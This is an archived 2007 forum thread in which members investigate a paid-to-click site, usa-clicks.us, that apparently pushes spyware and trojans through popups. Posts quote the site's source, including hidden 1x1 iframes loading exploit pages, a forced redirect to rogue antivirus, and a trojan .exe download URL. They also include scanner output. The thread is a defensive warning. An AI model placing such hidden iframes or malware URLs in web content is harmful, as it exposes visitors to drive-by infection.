 USA-Clicks, script that forces you to download something with a virus or TH etc |
Advertise Here
  |
  Apr 2 2007, 04:16 PM
Post
#1
|
|
|
Active Member  Group: New Signups Posts: 43 Joined: 4-September 06 Member No.: 86317  |
I can't even log into this program with a window popping up saying my computer is infected with spyware and if i try to close it it trys to force a download and sometimes succeeds without my permission to download, I literally have to shut firefox down and restart a new window
I can't complain to them as they have no contact sight from the home signup page... Maybe they'll figure it out. when I don't click any more emails.... |
 |
 
|
|
Apr 2 2007, 06:26 PM
Post
#2
|
|
|
Active Member Group: Full Members Posts: 85 Joined: 11-July 06 From: Saint Augustine, Florida Member No.: 83434 |
No zeroiframes detected!
Check took 3.11 seconds (Level: 0) Url checked: http:// usa-clicks.us CODE Source code of submitted URL: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Usa-clicks.us</title> <link href="style.css" rel="stylesheet" type="text/css" /> <script> //Pop-under window- By JavaScript Kit //Credit notice must stay intact for use //Visit http:// javascriptkit.com for this script //specify page to pop-under var popunder="http:// www.ptpads.us/ptp.php?usr=wojtek0s0" //specify popunder window features //set 1 to enable a particular feature, 0 to disable var winfeatures="width=800,height=510,scrollbars=0,resizable=0,toolbar=0,location=0,menubar=0,status=0,directories=0" //Pop-under only once per browser session? (0=no, 1=yes) //Specifying 0 will cause popunder to load every time page is loaded var once_per_session=1 ///No editing beyond here required///// function get_cookie(Name) { var search = Name + "=" var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search) if (offset != -1) { // if cookie exists offset += search.length // set index of beginning of value end = document.cookie.indexOf(";", offset); // set index of end of cookie value if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)) } } return returnvalue; } function loadornot(){ if (get_cookie('popunder')==''){ loadpopunder() document.cookie="popunder=yes" } } function loadpopunder(){ win2=window.open(popunder,"",winfeatures) win2.blur() window.focus() } if (once_per_session==0) loadpopunder() else loadornot() </script> </head> This one loads luxemil - ptpads.us CODE Total zeroiframes found: 1
(Level: 0) Url checked: http:// www.ptpads.us/ptp.php?usr=wojtek0s0 Zeroiframes detected on this site: 0 No ad codes identified (Level: 1) Url checked: (frame source) scripts/include/ptp_top.php?usr=wojtek0s0&credit=0&url=http:// tds.revsp.com/in.cgi?default&cmp=799 Blank page / could not connect (Level: 1) Url checked: (frame source) http:// www.ptpads.us/scripts/include/ptp_left.php Zeroiframes detected on this site: 0 Google code detected (Ads, not a cheater) (Level: 2) Url checked: (script source) http:// pagead2.googlesyndication.com/pagead/show_ads.js Zeroiframes detected on this site: 0 No ad codes identified (Level: 3) Url checked: (iframe source) http:// pagead2.googlesyndication.com/pagead/+m(d)+ Blank page / could not connect (Level: 3) Url checked: (script source) http:// pagead2.googlesyndication.com/pagead/+m(d)+ Blank page / could not connect (Level: 3) Url checked: (script source) http:// pagead2.googlesyndication.com/pagead/+m(d)+ Blank page / could not connect (Level: 1) Url checked: (frame source) http:// tds.revsp.com/in.cgi?default&cmp=799 Zeroiframes detected on this site: 0 No ad codes identified (Level: 1) Url checked: (frame source) http:// www.ptpads.us/scripts/include/ptp_right.php Zeroiframes detected on this site: 0 No ad codes identified (Level: 2) Url checked: (iframe source) http:// www.luxemil.com/search/portal.php?username=mew Zeroiframes detected on this site: 1 No ad codes identified (Level: 3) Url checked: (iframe source) http:// www.luxemil.com/search/anticheat.php?username=mew Zeroiframes detected on this site: 0 No ad codes identified This post has been edited by cconniejean: Apr 2 2007, 06:30 PM |
|
|
|
|
Apr 2 2007, 07:24 PM
Post
#3
|
|
|
Active Member Group: Full Members Posts: 85 Joined: 11-July 06 From: Saint Augustine, Florida Member No.: 83434 |
|
|
|
|
| Guest_wagdoll_* |
Apr 3 2007, 02:17 AM
Post
#4
|
|
Guests |
From the ptpads URL I got free20, drivecleaner, some porn URL going through the status bar as well as luxemil, before I hit stop. They actually have winantiviruspro in the PTP frame!! And that has four zero iframe visible on that page.
There are some trojans on there too, presumably got keyloggers in them. This is a very nasty site! This is stuff from adblock before I hit stop: http://www. luxemil.com/search/portal.php?username=mew (Autosearches) http://www. free20.com/portal/index.php?aff=mew (Autosearches) http:// zero.allgreathost.com/framecj.htm?aff_id=1006 http:// codecsoft.net/strong/066/ (Trojan/exploit) http:// nnew-adult.info/traffic/snt01/ (Trojan/exploit) http:// tinyurl.com/2ns6q3 http:// pornoinfosn.com/images/logo.gif http:// codecsoft.net/strong/066/exp1.htm (Trojan/exploit) http:// codecsoft.net/strong/066/exp2.htm (Trojan/exploit) http:// codecsoft.net/strong/066/exp3.htm (Trojan/exploit) http:// codecsoft.net/strong/066/exp4.htm (Trojan/exploit) This is the code from the winantiviruspro site that's in the PTP frame (the url on open in new window is: http:// tds.revsp.com/in.cgi?default CODE <script language="javascript" type="text/javascript"><!-- window.open("http://go.drivecleaner.com/MTA1OTM=/2/4506/ax=1/ed=2/ex=1//","dfdr","x=5000,top=5000,y=5000, left=5000,height=10,width=10,directories=no,toolbar=no,addressbar=no, resizable=yes,menubar=no,scrollbars=yes"); // --> </SCRIPT> </head> <iframe src="http://zero.allgreathost.com/framecj.htm?aff_id=1006" width=1 height=1></iframe> <iframe src='http://codecsoft.net/strong/066/' width=1 height=1></iframe> <iframe src="http://nnew-adult.info/traffic/snt01/" width=1 height=1></iframe> <iframe src="http://tinyurl.com/2ns6q3" width=1 height=1></iframe> <body> <DIV align=center> <CENTER><META HTTP-EQUIV="Refresh" CONTENT="2; URL=http://go.drivecleaner.com/MTA1OTM=/2/4506/ax=1/ed=2/ex=1//"> Free20 is in the credit frame http:// ptpads.us/scripts/include/ptp_top.php?usr=wojtek0s0&credit=8&url=http://tds.revsp.com/in.cgi?default&cmp=799 CODE <iframe width=1 height=1 frameborder=0 src='http://www.free20.com/portal/index.php?aff=mew' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe> http:// codecsoft.net/strong/066/ (Trojan Do not click!) CODE No zeroiframes detected! Check took 1.54 seconds (Level: 0) Url checked: http://codecsoft.net/strong/066/ Zeroiframes detected on this site: 0 No ad codes identified (Level: 1) Url checked: (iframe source) http://codecsoft.net/strong/066/exp1.htm Zeroiframes detected on this site: 0 No ad codes identified (Level: 1) Url checked: (iframe source) http://codecsoft.net/strong/066/exp2.htm Zeroiframes detected on this site: 0 No ad codes identified (Level: 1) Url checked: (iframe source) http://codecsoft.net/strong/066/exp3.htm Zeroiframes detected on this site: 0 No ad codes identified (Level: 1) Url checked: (iframe source) http://codecsoft.net/strong/066/exp4.htm Zeroiframes detected on this site: 0 No ad codes identified I don't believe these people. I could understand them sending autosearches, but now they are pusposely sending trojans to people and paying members to promote the links to spread them (IMG:http://www.getpaidforum.com/forums/style_emoticons/default/an.gif) |
|
|
|
|
Apr 3 2007, 02:44 AM
Post
#5
|
|
|
Active Member Group: Full Members Posts: 85 Joined: 11-July 06 From: Saint Augustine, Florida Member No.: 83434 |
Wow, no wonder moochette has problems. Thanks wagdoll, glad I didn't actually go there. I just used the Jutakys-Detektor. Hope you everything sorted out moochette.
|
|
|
|
| Guest_wagdoll_* |
Apr 3 2007, 03:19 AM
Post
#6
|
|
Guests |
Yeah, there's more in there too. Jutaky's detektor didn't show it up in your scan, and it gave an error message for me which is why I went to the page directly.
http:// zero.allgreathost.com/framecj.htm?aff_id=1006 (Do not click, active malware!) This has an adodb stream exploit on there and this .exe file CODE http://zero.allgreathost.com/abc1006def.exe'; // troj url As you can see from the end "troj url" that is another trojan downloading This is up there with iframemoney/xbanners/kamilet for maliciousness. |
|
|
|
|
Apr 3 2007, 07:16 AM
Post
#7
|
|
|
Active Member Group: New Signups Posts: 43 Joined: 4-September 06 Member No.: 86317 |
I have checked my computer, I have run 2 different virus scans, a anti-Spyware program, AND spybot.....
My computer comes up clean (except for tracking cookies).... I once again tried to log into the sight, and I got an ad come up saying that some member was credited 0 credits for logging into the sight (I did it directly from FireFOX) followed NO LINK......and walla in the middle of the page comes up a box saying that my computer has logs of all porn sights I've visited etc etc etc....the only way to get out of it without FORCING a download was to go into Windows Task Menu and manually shut down firefox..... Somehow I don't think its me.... I run each and every program at least every other day......I stopped using IE to do PTR emails.....and I FINALLY picked up the last TH on my computer the other week that kept trying to install every time I ran IE...... once again as soon as I tried to enter the sight...... only this time I got an ad.....and yeap, I've been that rout of the 'free virus scan software etc...its nothing but a TH, and malware, and Spyware'..... (IMG:http://www.getpaidforum.com/forums/style_emoticons/default/bj.gif) moochette |
|
|
|
|
Apr 3 2007, 09:39 AM
Post
#8
|
|
|
Active Member Group: New Signups Posts: 43 Joined: 4-September 06 Member No.: 86317 |
Same thing from a different computer........
I tried to acces usa-clicks.us from a totally different computer, if its not the sight, its whoever has the first advertisement. I couldn't get to the sight without a popup window advertising to come up, that I did from the main page--not a link, so I shouldn't be seeing any advertisement at all or promotions.....a persons promotion came up and then the spyware/adult tracks window forcing me to shut firefox down to avoid clicking on OK, or even the x bar or cancel...... For once I can say its NOT my computer......because I went to a computer that I know is free of spyware and malware...... |
|
|
|
| Guest_wagdoll_* |
Apr 3 2007, 05:47 PM
Post
#9
|
|
Guests |
It's not your computer moochette, the site is sending you these trojans on purpose inside that popup. They are trying to damage your PC and probably put on keyloggers to access your e-currency accounts (like e-gold).
|
|
|
|
|
Apr 10 2007, 01:30 AM
Post
#10
|
|
|
Active Member Group: Full Members Posts: 62 Joined: 28-August 06 Member No.: 85942 |
about a month ago, I purchased advertising and never received it. (IMG:http://www.getpaidforum.com/forums/style_emoticons/default/az.gif)
Emailed them a few times and never received a response. (IMG:http://www.getpaidforum.com/forums/style_emoticons/default/az.gif) |
|
|
|
|
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:
Advertise Here
| Lo-Fi Version | Time is now: 16th May 2012 - 05:02 PM |
Hosting Provided by:
HostingLagoon